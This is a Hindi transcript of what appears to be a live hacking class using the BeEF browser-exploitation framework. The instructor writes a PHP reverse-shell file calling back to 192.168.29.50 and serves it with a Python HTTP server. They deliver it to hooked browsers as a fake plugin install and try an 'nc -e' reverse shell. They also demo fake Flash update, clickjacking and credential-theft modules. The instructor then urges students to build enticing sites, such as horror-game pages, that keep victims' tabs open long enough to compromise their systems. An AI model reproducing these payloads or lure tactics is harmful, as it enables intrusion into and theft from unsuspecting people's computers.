को कर देते हैं, मैं एक मालवेयर फटाफट से क्रिएट कर देता हूँ, टच shell.php लीफ एड shell.php और यहाँ पे पास थ्रू bin bash 192.168.29.50 सेव, ठीक है। 4455 पे नहीं, यहाँ पे 4444 पे स्टार्ट कर देते हैं पाइथन का सर्वर, ठीक है। अब यहाँ पे हम दे देते हैं HTTP 192.168.29.50 4444/shell.php। ओके, जस्ट वेट करो, मैं गेट खोल के आया, मेरी मम्मी आ गई, सो जस्ट वेट फॉर अ मिनट, 1 मिनट में आया मैं।
तो यहाँ पे हमारे पास ये आ गया, ठीक है। अभी मैं करता क्या हूँ कि यहाँ पे इसको एग्जीक्यूट करता हूँ एंड यहाँ पे जाके देखता हूँ, तो ये देखो इंस्टॉल दिस प्लगइन, तो इंस्टॉल करता हूँ तो यहाँ पे shell.php मेरे पास इंस्टॉल हो गया है। अभी अगर मैं इसको एग्जीक्यूट कराता हूँ, जैसे कि अगर मैं इसको एग्जीक्यूट कराऊँ, ठीक है, यहाँ पे देखो एक रिक्वेस्ट shell.php की आई है, और अगर हाँ 2 मिनट सोडा एसयू, और अगर मैं इसको अपने सिस्टम पे एग्जीक्यूट कराता हूँ, कहाँ गया shell.php cd शेल, ठीक है, और 2 मिनट रुक जाए यार, क्लास दे रहा हूँ, ठीक है। तो यहाँ पे मैं chmod +x सबको कर देता हूँ, ठीक है, और यहाँ पे .shell.php को एग्जीक्यूट कराता हूँ। सिंटैक्स एरर ये अनएक्सपेक्टेड कैट shell.php पास थ्रू, सही तो है पूरा कमांड, अरे रुको, यहाँ पे नॉर्मल nc-e 192.168.29.50 और पोर्ट दे देता हूँ 44, नो पोर्ट्स टू कनेक्ट, अरे यहाँ पे नहीं, 44455 कनेक्ट नहीं हुआ, क्या बात है, कनेक्ट नहीं हुआ, नो पोर्ट्स टू कनेक्ट टू, कुछ तो प्रॉब्लम है, ठीक है। तो ऐसे ही हैकर करते क्या है कि यहाँ पे जैसे विंडोज़ है तो विंडोज़ में मालवेयर डाउनलोड करा देते हैं, ठीक है, वो ऐसे करेंगे एंड देन इसके बाद यहाँ पे एक्चुअली पता नहीं हुआ क्यों नहीं, एंड जस्ट वो लोग ऐसे पैनल खोल के रखते हैं तो वहाँ पे उनके पास रिवर्स शेल आ जाता है। बट ये चीज़ कह सकते हो थोड़ा कॉम्प्लिकेटेड है अभी के लिए तुम लोगों के लिए, क्योंकि यहाँ पे ये जो है वो थोड़ा कह सकते हो पेनिट्रेशन टेस्टिंग का पार्ट है, उसमें तुमको पहले समझना पड़ेगा कि एक्चुअल में मालवेयर होती क्या है, पेलोड्स क्या होते हैं, देन उनको बनाया कैसे जाता है, तो ये सारी चीज़ें ऑल ओवर चीज़ें तुम लोगों को जानना पड़ता है, ठीक है, उन सब चीज़ों से रिलेटेड। तो यहाँ पे मैं बंद कर देता हूँ, ठीक है। तो यहाँ पे तुम लोग और बाकी सारी चीज़ें तो कर सकते हो, ब्राउज़र को पेनिट्रेट कर सकते हो, सिस्टम्स में एक्सेस वगैरह ले सकते हो अगर तुमको पेनिट्रेशन टेस्टिंग आती है तो, ठीक है, वरना यहाँ पे मुश्किल है कि आप लोग लाइक ब्राउज़र पे पेनिट्रेट करके आप लोग ऐसे किसी के भी सिस्टम पे घुस जाओ, ठीक है, क्योंकि वहाँ पे कई सारी ऐसी चीज़ें टास्क परफॉर्म करना रहता है जो कि आप लोगों ने अभी सीखी नहीं है। अगर आप लोगों को आती हैं देन आप लोग अपने ही लैब एनवायरनमेंट में प्रैक्टिस कर सकते हो, ठीक है, देन देयर इज़ नॉट अ प्रॉब्लम। जस्ट 1 मिनट में चार्ज में लगा लो। सो यहाँ पे ऐसे ही है, और टेक्स्ट टू वॉइस जैसे कि यहाँ पे हेलो फ्रॉम बीफ एग्जीक्यूट करता हूँ, ओके ये तो नहीं हुआ, सो कमांड मैसेज सेंट, बट यहाँ पे कोई भी ऐसा वॉइस तो आया नहीं है। फ्लैश अपडेट, क्लिक जैकिंग आप कह सकते हो एक अटैक है, बेसिकली कह सकते हो समथिंग अलग सा अटैक है थोड़ा, ठीक है, किसी को लालच वगैरह देना हो तब के लिए, बट स्टिल अभी इसको हम लोग नहीं देखते। रिप्लेस वीडियो, प्रिटी थेफ्ट, ये सारी तो चीज़ें हमने देख ही ली हैं, ठीक है। क्लिपी इसको तुम लोग कर सकते हो, एग्जीक्यूट करोगे तो यहाँ पे जाओ, देखो क्या हुआ, कुछ हुआ नहीं। एक्चुअल मैंने भी एक उतना यूज़ किया नहीं, बस मैं सोशल लिंकिंग ज़्यादातर यूज़ करता हूँ, ठीक है, बाकी तो इसको मैंने भी उतना वो नहीं की है, बस थोड़ी बहुत चीज़ें देखी, लाइक हर चीज़ में से मैंने थोड़ी थोड़ी चीज़ें करी हैं। तो यहाँ पे आप लोग ऐसे ही ट्राई कर सकते हो इन सब चीज़ों से, ठीक है, ऑल ओवर यहाँ पे ये चीज़ें जितनी भी हैं तो आप लोग भी ट्राई करो एंड यहाँ पे मेरे को बताओ कि आप लोगों ने क्या क्या ट्राई किया, एंड आप लोगों को कोई प्रॉब्लम आता है तो आप लोग प्रॉब्लम भी शेयर करो, ठीक है, कि यहाँ पे आप लोगों को एक चीज़ समझ नहीं आई है एंड यहाँ पे आप लोगों को प्रॉब्लम देखने को मिला है, ओके। तो यहाँ पे बाकी तो तो अब ये ब्राउज़र भी ऑफलाइन चला जाएगा, जैसे मैं इसको काट देता हूँ और रिफ़्रेश करता हूँ, तो जस्ट वेट करो, ये ऑफलाइन चला जाएगा। अभी नहीं गया, क्या बात है।
ये देखो चला गया, ऑनलाइन में अब कोई नहीं है क्योंकि वो सारे टैब क्लोज हो गए हैं। सो आप लोग मेक श्योर करना कि जो टैब है वो खुले रहें, ठीक है। कुछ ऐसा क्रिएटिविटी वेबसाइट बनाओ कि लाइक आप लोगों की वेबसाइट को थोड़ा देखें वो, ठीक है, टाइम टू टाइम, लाइक एटलीस्ट 5 मिनट तो देखें, क्योंकि 5 मिनट में हैकर्स लोग किसी के भी सिस्टम का एक्सेस ले सकते हैं, ठीक है, मालवेयर वगैरह वहाँ पे पूरा सा पहले से ही सेट वगैरह करके, ठीक है। करने को वो लोग कह सकते हो और भी पहले कर सकते हैं, लेकिन जस्ट एटलीस्ट 5 मिनट तो वो देखे, कुछ ऐसा वो बनाओ, ठीक है, वेबसाइट वगैरह, क्रिएटिव वेबसाइट या आइडिया लगाओ, ठीक है, या कोई प्री मेडेड वेबसाइट ही बना दो, ठीक है, कुछ भी, या किसी ऐसे हॉरर गेम की वेबसाइट बना सकते हो क्योंकि लाइक लोगों को ऐसे हॉरिफाइंग चीज़ काफ़ी ज़्यादा पसंद आती हैं, ओके। तो वो लोग आपकी वेबसाइट को देखते रहेंगे कि एक्चुअल में वेबसाइट में है क्या, हम भी देखें ज़रा इसमें, ठीक है। सो अभी कोई चीज़ में आप लोगों को डाउट है, कोई चीज़ पूछना है यहाँ पे जो समझ नहीं आई हो बीफ में? विशाल कुछ पूछना है? स्पाइडी तुमको कुछ पूछना है? ना ना समझ में आया।